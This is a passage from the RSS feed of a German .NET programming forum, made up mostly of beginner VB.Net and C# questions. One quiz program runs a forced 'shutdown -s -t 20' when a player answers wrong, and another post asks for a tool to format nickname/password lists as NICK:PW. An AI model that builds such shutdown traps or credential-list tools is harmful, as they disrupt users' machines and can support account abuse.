/><br />&nbsp;&nbsp;&nbsp;&nbsp;Private&nbsp;Sub&nbsp;Button3_Click(ByVal&nbsp;sender&nbsp;As&nbsp;System.Object,&nbsp;ByVal&nbsp;e&nbsp;As&nbsp;System.EventArgs)&nbsp;Handles&nbsp;Button3.Click<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Shell("shutdown&nbsp;-s&nbsp;-t&nbsp;20")<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MsgBox("Du&nbsp;hast&nbsp;Verloren!",&nbsp;MsgBoxStyle.Critical)<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub<br />End&nbsp;Class&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Wie man im Code sehen kann, ist Button2 der richtige von allen 4ren. Bei Button 1,3,4 würde der PC heruntergefahren werden mit: <div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">Shell</span><span style="color: #007700">(</span><span style="color: #DD0000">"shutdown&nbsp;-s&nbsp;-t&nbsp;20"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">MsgBox</span><span style="color: #007700">(</span><span style="color: #DD0000">"Du&nbsp;hast&nbsp;Verloren!"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">MsgBoxStyle</span><span style="color: #007700">.</span><span style="color: #0000BB">Critical</span><span style="color: #007700">)&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Wenn Button2 angeklickt wird erscheint eine MsgBox-Box das man gewonnen hat: <div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">MsgBox</span><span style="color: #007700">(</span><span style="color: #DD0000">"Du&nbsp;hast&nbsp;Gewonnen!"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">MsgBoxStyle</span><span style="color: #007700">.</span><span style="color: #0000BB">Exclamation</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Timer1</span><span style="color: #007700">.</span><span style="color: #0000BB">Stop</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Me</span><span style="color: #007700">.</span><span style="color: #0000BB">Close</span><span style="color: #007700">()&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Nachdem die MsgBox angezeigt wird, stoppe ich den Timer und will die Form schließen, doch wenn man nicht schnell genug ist und 1-2 Sekunden wartet, kommt die Meldung das man Verloren hat und der PC in 1 Minute herunterfährt.<br />
<br />
Aber wieso? Ich habe den Timer doch gestoppt, die 20 Sekunden laufen garnicht mehr.<br />
<br />
Ich hab echt kein Plan mehr, habe auch im Form_Load Ereignis Form1.Close usw. bis Form13 gemacht um alles komplett zu beenden, nützt alles einfach nichts.<br />
<br />
Läuft irgendwo die Zeit weiter? Habe auf jeder Form 1 Timer wo jeweils 20 Sekunden auf 0 laufen, wollte eigentlich nur bei der 1. Frage 1 Timer mit 300 Sekunden benutzen, der dann bis Frage 10 durchläuft, nur weiß ich nicht wie ich die übrige Zeit immer weiter auf die anderen Formen übertragen soll. Also habe ich einfach je Form 20 Sekunden genommen.<br />
<br />
An den anderen Fragen wo auch 20 Sekunden vorher laufen kann es eigentlich nicht liegen, habe mal bei Frage 2 oder so von den 20 Sekunden 18 ablaufen lassen, dann bin ich auf weiter habe bei der nächsten Frage so 5 Sekunden gewartet und es ist nichts passiert. Also zählt der Timer von der 1. Frage nicht mehr weiter.<br />
<br />
Muss also einen anderen Grund haben, wieso das Programm am Ende trotzdem noch zusätzlich den PC herunterfahren will.<br />
<br />
Hoffe mir kann jemand helfen.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/fehler-programm-7409</guid>
		</item>
		<item>
			<title><![CDATA[[S] Programm welches ein : zwischen 2 Wörter setzt]]></title>
			<link>net-94/s-programm-welches-ein-zwischen-2-woerter-setzt-7379?goto=newpost</link>
			<pubDate>Fri, 17 Feb 2012 08:37:58 GMT</pubDate>
			<description>Hey, 
Könnte mir jemand schnell ein tool coden welches ein : setzt. 
Also eine .txt einliest welche folgendermaßen angeordnet  ist : 
NICK 
PW 
Und...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
Könnte mir jemand schnell ein tool coden welches ein : setzt.<br />
Also eine .txt einliest welche folgendermaßen angeordnet  ist :<br />
NICK<br />
PW<br />
Und ich möchte es gerne als NICK:PW <br />
Wäre lieb.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/s-programm-welches-ein-zwischen-2-woerter-setzt-7379</guid>
		</item>
		<item>
			<title>VB.Net Video abspielen</title>
			<link>net-94/video-abspielen-7340?goto=newpost</link>
			<pubDate>Thu, 16 Feb 2012 19:03:12 GMT</pubDate>
			<description>Hallo. 
 
Ist es möglich in einer Form ein Video abspielen zu lassen? 
Zum Beispiel habe ich das Video auf einem WebServer und lasse es über die Form...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ist es möglich in einer Form ein Video abspielen zu lassen?<br />
Zum Beispiel habe ich das Video auf einem WebServer und lasse es über die Form abspielen. Möglich oder nicht?<br />
<br />
Danke.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/video-abspielen-7340</guid>
		</item>
		<item>
			<title>VB.Net Mails kommen nicht an</title>
			<link>net-94/mails-kommen-nicht-an-7297?goto=newpost</link>
			<pubDate>Wed, 15 Feb 2012 21:31:26 GMT</pubDate>
			<description>Hi. 
 
Kann mir mal wer sagen wieso mit dem Code keine Mails ankommen? ;8 
 
Dim MyMailMessage As New MailMessage() 
        MyMailMessage.From = New...</description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Kann mir mal wer sagen wieso mit dem Code keine Mails ankommen? ;8<br />
<br />
Dim MyMailMessage As New MailMessage()<br />
        MyMailMessage.From = New MailAddress(TextBox1.Text)<br />
        MyMailMessage.To.Add(TextBox4.Text)<br />
        MyMailMessage.Subject = (TextBox3.Text)<br />
        MyMailMessage.Body = TextBox5.Text<br />
        Dim SMTPServer As New SmtpClient(&quot;smtp.web.de&quot;)<br />
        SMTPServer.Port = 587<br />
        SMTPServer.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text)<br />
        SMTPServer.EnableSsl = True<br />
        Label6.Text = Val(Label6.Text + 1)<br />
        SMTPServer.Send(MyMailMessage)<br />
<br />
TextBox1 = Meine Mail-Adresse<br />
TextBox2 = Mein Mail-Passwort<br />
TextBox3 = Betreff<br />
TextBox4 = Empfänger Mail-Adresse<br />
TextBox5 = Text<br />
<br />
Möchte das mit einem Timer machen,<br />
beim Label6 wird auch nichts hinzugezählt, es passiert<br />
einfach nichts..<br />
<br />
Port stimmt, soll an web.de gehen.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/mails-kommen-nicht-an-7297</guid>
		</item>
		<item>
			<title><![CDATA[[VB] Tray]]></title>
			<link>net-94/vb-tray-7229?goto=newpost</link>
			<pubDate>Wed, 15 Feb 2012 08:57:19 GMT</pubDate>
			<description>Code: 
--------- 
  Private Sub NotifyIcon1_Click(ByVal sender As Object, ByVal e As System.EventArgs) Handles NotifyIcon1.Click 
       ...</description>
			<content:encoded><![CDATA[<div><div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; Private Sub NotifyIcon1_Click(ByVal sender As Object, ByVal e As System.EventArgs) Handles NotifyIcon1.Click<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.ShowInTaskbar = True<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.NotifyIcon1.Visible = False<br />
&nbsp; &nbsp; &nbsp; &nbsp; Me.WindowState = FormWindowState.Normal<br />
&nbsp; &nbsp; End Sub</code><hr />
</div><div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; &nbsp; Private Sub Form1_Resize(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Resize<br />
&nbsp; &nbsp; &nbsp; &nbsp; If Me.WindowState = FormWindowState.Minimized Then<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.ShowInTaskbar = False<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.WindowState = FormWindowState.Minimized<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.NotifyIcon1.Visible = True<br />
&nbsp; &nbsp; &nbsp; &nbsp; End If<br />
&nbsp; &nbsp; End Sub<br />
End Class</code><hr />
</div>Quelle: Google + Manche Sachen von mir.<br />
Übersetzt in C#<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">private void NotifyIcon1_Click(object sender, System.EventArgs e)<br />
{<br />
&nbsp; &nbsp; &nbsp; &nbsp; this.ShowInTaskbar = true;<br />
&nbsp; &nbsp; &nbsp; &nbsp; this.NotifyIcon1.Visible = false;<br />
&nbsp; &nbsp; &nbsp; &nbsp; this.WindowState = FormWindowState.Normal;<br />
}</code><hr />
</div><div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Endclass Unknown {<br />
}<br />
<br />
&nbsp; &nbsp; <br />
&nbsp; &nbsp; private void Form1_Resize(object sender, System.EventArgs e) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; if ((this.WindowState == FormWindowState.Minimized)) {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; this.ShowInTaskbar = false;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; this.WindowState = FormWindowState.Minimized;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; this.NotifyIcon1.Visible = true;<br />
&nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; }</code><hr />
</div>Viel Spaß</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/vb-tray-7229</guid>
		</item>
		<item>
			<title>VB.Net Datei in ausgewählten Ordner kopieren</title>
			<link>net-94/datei-in-ausgewaehlten-ordner-kopieren-7023?goto=newpost</link>
			<pubDate>Sun, 12 Feb 2012 11:47:11 GMT</pubDate>
			<description><![CDATA[Morgen werteste Commuinity ;) 
 
ist es möglich eine Datei mittels "FolderBrowserDialog" in einen Ordner zu kopieren? 
 
Also dass ich beispielsweise...]]></description>
			<content:encoded><![CDATA[<div>Morgen werteste Commuinity ;)<br />
<br />
ist es möglich eine Datei mittels &quot;FolderBrowserDialog&quot; in einen Ordner zu kopieren?<br />
<br />
Also dass ich beispielsweise eine Textdatei, die ich in meinem Programm als Resource gespeichert habe, dann in einen ausgewählten Ordner kopiere.<br />
<br />
MfG Mobilitas</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Mobilitas</dc:creator>
			<guid isPermaLink="true">net-94/datei-in-ausgewaehlten-ordner-kopieren-7023</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [VB 2010] Ordner Erstellen]]></title>
			<link>net-94/vb-2010-ordner-erstellen-6943?goto=newpost</link>
			<pubDate>Sat, 11 Feb 2012 00:10:27 GMT</pubDate>
			<description>Moin, 
ich hab ein kleines Problem und zwar, 
 
ich möchte in mein Debug ein Ordner erstellen in den Ordner soll er dann 4 Textdokumente abspeichern...</description>
			<content:encoded><![CDATA[<div>Moin,<br />
ich hab ein kleines Problem und zwar,<br />
<br />
ich möchte in mein Debug ein Ordner erstellen in den Ordner soll er dann 4 Textdokumente abspeichern<br />
aber ich hab mich Schon hier Rummgeschaut aber nichts gefunden.<br />
<br />
bitte um hilfe<br />
mfg</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>getsha</dc:creator>
			<guid isPermaLink="true">net-94/vb-2010-ordner-erstellen-6943</guid>
		</item>
		<item>
			<title>VB.Net Onlinebot PopUps sehen</title>
			<link>net-94/onlinebot-popups-sehen-6686?goto=newpost</link>
			<pubDate>Tue, 07 Feb 2012 14:46:22 GMT</pubDate>
			<description>Hiii, ich hab ne frage kann man eig in ein Onlinebot was in Visual basic 2010 geschrieben ist richtige PopUps anzeigen lassen mit style und nicht nur...</description>
			<content:encoded><![CDATA[<div>Hiii, ich hab ne frage kann man eig in ein Onlinebot was in Visual basic 2010 geschrieben ist richtige PopUps anzeigen lassen mit style und nicht nur Code geht das ??<br />
<br />
MfG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>getsha</dc:creator>
			<guid isPermaLink="true">net-94/onlinebot-popups-sehen-6686</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net RichTextBox1.AppendText("Text")]]></title>
			<link>net-94/richtextbox1-appendtext-text-6462?goto=newpost</link>
			<pubDate>Sun, 05 Feb 2012 04:13:20 GMT</pubDate>
			<description>Hii UH com ich komm nicht weiter wollte was schreiben aber in die RichTextBox1.macht der den text immer so standartgröße halt aber ich wollte das bei...</description>
			<content:encoded><![CDATA[<div>Hii UH com ich komm nicht weiter wollte was schreiben aber in die RichTextBox1.macht der den text immer so standartgröße halt aber ich wollte das bei bestimmten stellen Fett machen oder den ganzen satz fett aber ich weiß net wie das geht ich weiß nur wie man die farbe ändert und das er Enter macht. aber mit FETT,Kursiv,Unterstreichen,Durschstreich Weiß ich nicht wie das geht..<br />
<br />
Hier so ein code hab ich schonnma hinbekommen,<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">RichTextBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">SelectionColor&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Color</span><span style="color: #007700">.</span><span style="color: #0000BB">Black<br />RichTextBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">AppendText</span><span style="color: #007700">(</span><span style="color: #DD0000">"Sie&nbsp;Sind"</span><span style="color: #007700">)&nbsp;</span><span style="color: #DD0000">'&lt;&lt;&nbsp;Der&nbsp;text&nbsp;Soll&nbsp;Dünn&nbsp;sein.'<br /></span><span style="color: #0000BB">RichTextBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">SelectionColor&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Color</span><span style="color: #007700">.</span><span style="color: #0000BB">LimeGreen<br />RichTextBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">AppendText</span><span style="color: #007700">(</span><span style="color: #DD0000">"&nbsp;Online!"&nbsp;</span><span style="color: #007700">&amp;&nbsp;</span><span style="color: #0000BB">vbNewLine</span><span style="color: #007700">)&nbsp;</span><span style="color: #DD0000">'&lt;&lt;&#91;&nbsp;Der&nbsp;text&nbsp;soll&nbsp;Fett&nbsp;sein.'&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>MfG Getsha</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>getsha</dc:creator>
			<guid isPermaLink="true">net-94/richtextbox1-appendtext-text-6462</guid>
		</item>
		<item>
			<title>VB.Net .dll in Programm einbinden</title>
			<link>net-94/dll-in-programm-einbinden-6028?goto=newpost</link>
			<pubDate>Mon, 30 Jan 2012 18:19:44 GMT</pubDate>
			<description><![CDATA[Hi. 
 
Mein Programm benötigt zwei .dll's damit es funktioniert. Habe aber keine Lust immer die .exe + 2 .dll's in einem Ordner zu haben. Man kann...]]></description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Mein Programm benötigt zwei .dll's damit es funktioniert. Habe aber keine Lust immer die .exe + 2 .dll's in einem Ordner zu haben. Man kann das doch irgendwie so machen das man die .dll's irgendwie in das Programm einbindet und sie nicht mehr zusammen mit der .exe in einem Ordner haben muss.<br />
<br />
Habe das schonmal mit einem Tutorial probiert, danach konnte meine Form nicht mehr angezeigt werden und ich musste alles neu machen ;(<br />
<br />
Kann mir mal jemand (der sich auch wirklich auskennt) zeigen wie das funktioniert?<br />
<br />
Danke.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/dll-in-programm-einbinden-6028</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net Richtextbox & button pro klick = 1 text]]></title>
			<link>net-94/richtextbox-button-pro-klick-1-text-6005?goto=newpost</link>
			<pubDate>Mon, 30 Jan 2012 14:39:33 GMT</pubDate>
			<description>Hiii liebe com ich komm nicht weiter hab schonn gegooglet aber nix gefunden ;( naya ich fang mal an was ich machen möchte also;: ich will 
versuchen...</description>
			<content:encoded><![CDATA[<div>Hiii liebe com ich komm nicht weiter hab schonn gegooglet aber nix gefunden ;( naya ich fang mal an was ich machen möchte also;: ich will<br />
versuchen wenn man auf ein button klickt kommt was in der richtextbox<br />
aber es sollen 3 verschiedene texte kommen pro klick aber ich bekomm das irgendwie net<br />
hin<br />
<br />
also wenn ich auf den button klicke kommt zb : &quot;Hallo 1&quot;<br />
und wenn ich nochmal klicke kommt &quot;Hallo 2&quot;<br />
und beim 3ten klick soll dann auch &quot;Hallo 3&quot; kommen und dann fäng es wieder von vorne an (&quot;Hallo 1&quot;)<br />
<br />
aber ich bekomm es irgendwie nicht hin ;(<br />
bitte um hilfe<br />
mfg<br />
<br />
Zurzeit hab ich den code so stehen:<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Public Class Form1<br />
<br />
&nbsp; &nbsp; Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click<br />
&nbsp; &nbsp; &nbsp; &nbsp; Timer1.Start()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Timer2.Start()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Timer3.Start()<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub RichTextBox1_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles RichTextBox1.TextChanged<br />
&nbsp; &nbsp; &nbsp; &nbsp; RichTextBox1.ScrollToCaret()<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick<br />
&nbsp; &nbsp; &nbsp; &nbsp; RichTextBox1.AppendText(&quot;h3h3 1&quot; + vbNewLine)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Timer1.Stop()<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick<br />
&nbsp; &nbsp; &nbsp; &nbsp; RichTextBox1.AppendText(&quot;h3h3 2&quot; + vbNewLine)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Timer2.Stop()<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick<br />
&nbsp; &nbsp; &nbsp; &nbsp; RichTextBox1.AppendText(&quot;h3h3 3&quot; + vbNewLine)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Timer3.Stop()<br />
&nbsp; &nbsp; End Sub<br />
End Class</code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>getsha</dc:creator>
			<guid isPermaLink="true">net-94/richtextbox-button-pro-klick-1-text-6005</guid>
		</item>
		<item>
			<title>VB.Net TCP Paket bilden - Paketzeichnung lesen</title>
			<link>net-94/tcp-paket-bilden-paketzeichnung-lesen-5830?goto=newpost</link>
			<pubDate>Sat, 28 Jan 2012 09:52:39 GMT</pubDate>
			<description>Hallo, 
 
ich würde mich gerne auf einem Server einloggen. 
 
Bin mit der Netzwerkprogrammierung erst neu dabei also seid bitte noobfriendly. 
 
...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich würde mich gerne auf einem Server einloggen.<br />
<br />
Bin mit der Netzwerkprogrammierung erst neu dabei also seid bitte noobfriendly.<br />
<br />
<br />
Also ich muss ja jetzt erstersteinmal das Paket lesen können.<br />
<br />
<a href="http://de.wikipedia.org/wiki/IP-Paket" target="_blank" rel="nofollow">IP-Paket</a><br />
<br />
Wireshark zeigt mir, dass der Header 20 Bytes lang ist, also gehe ich von Ipv4 aus.<br />
<br />
Wie ist das z.B. mit der Version?<br />
Wie übertrage ich 4 bit?<br />
<br />
<br />
Danke im Vorraus.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/tcp-paket-bilden-paketzeichnung-lesen-5830</guid>
		</item>
		<item>
			<title>VB.Net MediaPlayer funktioniert plötzlich nicht mehr</title>
			<link>net-94/mediaplayer-funktioniert-ploetzlich-nicht-mehr-5688?goto=newpost</link>
			<pubDate>Thu, 26 Jan 2012 16:40:33 GMT</pubDate>
			<description>Hi. 
 
Ich habe mir einen MusicPlayer gemacht. Gestern wollte ich was ändern und dann konnte irgendwie die Form nicht mehr richtig angezeigt werden....</description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Ich habe mir einen MusicPlayer gemacht. Gestern wollte ich was ändern und dann konnte irgendwie die Form nicht mehr richtig angezeigt werden.<br />
<br />
Ich habe ein neues Projekt gemacht, sieht von der Form her genauso aus wie das andere, und der Code ist eigentlich auch der selbe.<br />
<br />
Wenn ich jetzt per Klick auf das ListView ein Lied abspielen will passiert aber nichts, ich verstehe das nicht? Vorher ging es doch auch?<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">Imports&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Net<br /></span><span style="color: #007700">Public&nbsp;Class&nbsp;</span><span style="color: #0000BB">Form1<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;Form1_Load</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;MyBase</span><span style="color: #007700">.</span><span style="color: #0000BB">Load<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;files</span><span style="color: #007700">()&nbsp;As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;New&nbsp;</span><span style="color: #0000BB">WebClient</span><span style="color: #007700">().</span><span style="color: #0000BB">DownloadString</span><span style="color: #007700">(</span><span style="color: #DD0000">"http://*****.de/getfiles.php"</span><span style="color: #007700">).</span><span style="color: #0000BB">Split</span><span style="color: #007700">(</span><span style="color: #0000BB">vbLf</span><span style="color: #007700">)<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;For&nbsp;</span><span style="color: #0000BB">Each&nbsp;file&nbsp;In&nbsp;files<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">If&nbsp;</span><span style="color: #0000BB">Not&nbsp;file</span><span style="color: #007700">.</span><span style="color: #0000BB">Trim</span><span style="color: #007700">()&nbsp;=&nbsp;</span><span style="color: #0000BB">String</span><span style="color: #007700">.Empty&nbsp;</span><span style="color: #0000BB">Then<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ListView2</span><span style="color: #007700">.</span><span style="color: #0000BB">Items</span><span style="color: #007700">.</span><span style="color: #0000BB">Add</span><span style="color: #007700">(</span><span style="color: #0000BB">file</span><span style="color: #007700">.</span><span style="color: #0000BB">Split</span><span style="color: #007700">(</span><span style="color: #DD0000">"|"</span><span style="color: #007700">)(</span><span style="color: #0000BB">0</span><span style="color: #007700">)).</span><span style="color: #0000BB">SubItems</span><span style="color: #007700">.</span><span style="color: #0000BB">Add</span><span style="color: #007700">(</span><span style="color: #0000BB">file</span><span style="color: #007700">.</span><span style="color: #0000BB">Split</span><span style="color: #007700">(</span><span style="color: #DD0000">"|"</span><span style="color: #007700">)(</span><span style="color: #0000BB">1</span><span style="color: #007700">))<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;</span><span style="color: #007700">If<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Next<br /><br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;ListView2_Click</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Dim&nbsp;realname&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ListView2</span><span style="color: #007700">.</span><span style="color: #0000BB">SelectedItems</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">).</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #DD0000">"|"&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">ListView2</span><span style="color: #007700">.</span><span style="color: #0000BB">SelectedItems</span><span style="color: #007700">(</span><span style="color: #0000BB">0</span><span style="color: #007700">).</span><span style="color: #0000BB">SubItems</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">).</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #DD0000">".mp3"<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">realname&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"*****.de/"&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">realname<br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AxWindowsMediaPlayer2</span><span style="color: #007700">.</span><span style="color: #0000BB">URL&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">realname<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;ListView2_SelectedIndexChanged</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs</span><span style="color: #007700">)<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;Sub<br />End&nbsp;</span><span style="color: #007700">Class&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Bei meiner fertigen .exe spielt er Lieder ab, aber die kann ich wie gesagt nun nicht mehr bearbeiten da ich es neu gemacht habe.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/mediaplayer-funktioniert-ploetzlich-nicht-mehr-5688</guid>
		</item>
		<item>
			<title><![CDATA[[C#] Proxyfinder]]></title>
			<link>net-94/c-proxyfinder-5668?goto=newpost</link>
			<pubDate>Thu, 26 Jan 2012 11:51:02 GMT</pubDate>
